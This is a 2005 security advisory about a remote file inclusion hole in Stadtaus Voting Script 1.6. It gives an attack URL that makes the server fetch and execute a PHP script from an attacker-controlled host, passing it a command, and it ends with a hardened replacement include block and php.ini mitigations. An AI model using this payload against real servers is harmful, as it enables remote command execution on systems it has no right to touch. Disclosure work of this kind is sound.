stadtaus16.txt

2005-03-15T00:00:00
ID PACKETSTORM:36529
Type packetstorm
Reporter Nextime
Modified 2005-03-15T00:00:00

Description

-----------------------------------------------------------------------------
Name: Stadtaus Voting Script   
Release: 1.6   
Homepage: http://www.stadtaus.com/php_scripts/voting_script/  
Attack: Remote file inclusion  
Risk: High  
Date: 8 March 2005  
Author: Nextime  
-----------------------------------------------------------------------------  
  
CODE:  
  
file: /vs1.6/inc/core.inc.php  
  
  
/*****************************************************  
** Include functions  
*****************************************************/  
  
include($script_root . 'inc/functions.inc.php');  
include($script_root . 'inc/template.class.inc.php');  
include($script_root . 'inc/form_fields.class.inc.php');  
include($script_root . 'inc/voting.class.inc.php');  
  
  
  
---------------------------------------------------------------------------------------------  
  
ATTACK:

core.inc.php is an include-only file, but it can be requested directly over the web, and nothing in it assigns $script_root before the include() calls run. With register_globals=on the attacker's query parameter populates $script_root, and with allow_url_fopen=on include() will fetch a remote URL, so the first include becomes a remote file inclusion:

http://[target]/vs1.6/inc/core.inc.php?script_root=http://[attacker_host]/script.php?&cmd=id;

The target then includes http://[attacker_host]/script.php?inc/functions.inc.php: the trailing ? in the payload turns the appended 'inc/functions.inc.php' into a query string on the attacker's host, so script.php is fetched intact and executed on the target with the web server's privileges. The cmd parameter (also turned into $cmd by register_globals) lets a script.php containing, for example, system($cmd) run arbitrary commands. Note that the attacker's host must serve script.php as plain PHP source rather than executing it, or the target only receives its output. The other three include() lines are affected in the same way, but the first one already runs the attacker's code.
  
  
---------------------------------------------------------------------------------------------  
  
FIX:  
  
Vendor has been notified. Until a fixed release is available, the attack preconditions are the mitigation: run with register_globals=off and allow_url_fopen=off, and deny direct web access to the files under inc/.
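The following is an added example of a hardened replacement for the include block in inc/core.inc.php; it is not code from the advisory or from the Stadtaus Voting Script. It assumes (the advisory does not say so) that the script root is the parent directory of inc/, and it introduces two hypothetical names: the constant VS_ENTRY, which the real entry scripts (index.php and friends) would have to define before including this file, and the helper vs_valid_root().

```php
<?php
// Added example, not code from the Stadtaus Voting Script or the advisory.
// Hardened replacement for the include block in vs1.6/inc/core.inc.php.
// Assumptions: the script root is the parent directory of inc/, and every
// entry script defines the hypothetical constant VS_ENTRY before including
// this file (e.g. define('VS_ENTRY', true); at the top of index.php).

// 1. Refuse direct web requests to an include-only file. The advisory's
//    attack URL requests core.inc.php directly; with this guard it gets a 403
//    before any include() runs.
if (!defined('VS_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted.');
}

// 2. Never let the include base come from the request. Derive it from this
//    file's own location instead; dirname(__FILE__) exists on PHP 4 and 5
//    (__DIR__ only from 5.3), which matters for a 2005-era script.
$script_root = dirname(dirname(__FILE__)) . '/';

// 3. Defence in depth: even if later code overwrites $script_root, reject
//    anything carrying a URL scheme (http:, ftp:, php:, data:, phar:) or that
//    is not an existing local directory. realpath() also resolves ../ tricks.
//    The scheme regex requires two or more characters before the colon so a
//    Windows drive letter such as C:\ is not mistaken for a scheme.
function vs_valid_root($root)
{
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $root)) {
        return false;   // remote URL or stream wrapper: not a local path
    }
    $real = realpath($root);
    return $real !== false && is_dir($real);
}

if (!vs_valid_root($script_root)) {
    exit('Invalid script root.');
}

/*****************************************************
** Include functions
*****************************************************/
require_once $script_root . 'inc/functions.inc.php';
require_once $script_root . 'inc/template.class.inc.php';
require_once $script_root . 'inc/form_fields.class.inc.php';
require_once $script_root . 'inc/voting.class.inc.php';
```

The code change removes the injection point, but the two preconditions named in the advisory should be switched off as well, because every other include() in the application that builds a path from a variable is exposed in the same way. register_globals cannot be changed with ini_set() at runtime; set register_globals = Off in php.ini, httpd.conf, or a .htaccess (php_flag register_globals off). allow_url_fopen = Off blocks remote include() on PHP 4 and 5; from PHP 5.2 the narrower allow_url_include = Off does the same while leaving fopen() of URLs available to code that legitimately needs it.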
  
---------------------------------------------------------------------------------------------  
  
Contact:  
  
Nextime - nextime [at] linuxmail [dot] org  
  
  